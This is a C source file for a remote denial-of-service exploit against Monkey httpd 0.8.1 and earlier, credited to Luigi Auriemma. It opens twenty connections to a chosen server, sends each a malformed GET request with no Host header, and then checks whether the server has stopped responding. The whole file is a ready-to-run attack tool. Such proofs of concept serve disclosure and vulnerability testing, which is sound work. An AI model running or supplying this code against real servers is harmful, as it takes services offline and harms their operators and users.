/*

by Luigi Auriemma

UNIX & WIN VERSION
*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#ifdef WIN32
    #include <winsock.h>
    #include "winerr.h"

    #define close   closesocket
#else
    #include <unistd.h>
    #include <sys/socket.h>
    #include <sys/types.h>
    #include <arpa/inet.h>
    #include <netdb.h>
#endif




#define VER     "0.1"
#define PORT    2001
#define MAX     20
#define TIMEOUT 7
#define REQ     "GET /%%%%%%%%%%%% HTTP/1.0\r\n" \
                "\r\n"
                /* %%%%%%%%%%%% doesn't seem to be needed */
                /* no "Host" = BOOM */



int timeout(int sock);
u_long resolv(char *host);
void std_err(void);





int main(int argc, char *argv[]) {
    struct  sockaddr_in     peer;
    int     sd,
            err,
            i;
    u_short port = PORT;

    setbuf(stdout, NULL);

    fputs("\n"
        "Monkey httpd <= 0.8.1 remote DoS "VER"\n"
        "by Luigi Auriemma\n"
        "e-mail: aluigi@altervista.org\n"
        "web:    http://aluigi.altervista.org\n"
        "\n", stdout);

    if(argc < 2) {
        printf("\nUsage: %s <server> [port(%d)]\n"
            "\n", argv[0], PORT);
        exit(1);
    }

#ifdef WIN32
    WSADATA    wsadata;
    WSAStartup(MAKEWORD(1,0), &wsadata);
#endif

    if(argc > 2) port = atoi(argv[2]);

    peer.sin_addr.s_addr = resolv(argv[1]);
    peer.sin_port        = htons(port);
    peer.sin_family      = AF_INET;

    printf("\nConnections to %s:%hu\n",
        inet_ntoa(peer.sin_addr), port);

    for(i = 0; i < MAX; i++) {
        printf("%d\r", i);

        sd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
        if(sd < 0) std_err();
        err = connect(sd, (struct sockaddr *)&peer, sizeof(peer));
        if(err < 0) std_err();
        err = send(sd, REQ, sizeof(REQ) - 1, 0);
        if(err < 0) std_err();
        close(sd);
    }

    printf("\n\n- Now I check if the server is dead (%d seconds):\n", TIMEOUT);

    sd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
    if(sd < 0) std_err();
    err = connect(sd, (struct sockaddr *)&peer, sizeof(peer));
    if(err < 0) std_err();
    err = send(sd, REQ, sizeof(REQ) - 1, 0);
    if(err < 0) std_err();
    err = timeout(sd);
    if(err < 0) {
        fputs("\n    Server IS vulnerable!!!\n\n", stdout);
    } else {
        fputs("\n    Server doesn't seem to be vulnerable\n\n", stdout);
    }
    close(sd);

    return(0);
}





int timeout(int sock) {
    struct  timeval tout;
    fd_set  fd_read;
    int     err;

    tout.tv_sec = TIMEOUT;
    tout.tv_usec = 0;
    FD_ZERO(&fd_read);
    FD_SET(sock, &fd_read);
    err = select(sock + 1, &fd_read, NULL, NULL, &tout);
    if(err < 0) std_err();
    if(!err) return(-1);
    return(0);
}




u_long resolv(char *host) {
    struct  hostent *hp;
    u_long  host_ip;

    host_ip = inet_addr(host);
    if(host_ip == INADDR_NONE) {
        hp = gethostbyname(host);
        if(!hp) {
            printf("\nError: Unable to resolve hostname (%s)\n", host);
            exit(1);
        } else host_ip = *(u_long *)(hp->h_addr);
    }
    return(host_ip);
}




#ifndef WIN32
    void std_err(void) {
        perror("\nError");
        exit(1);
    }
#endif


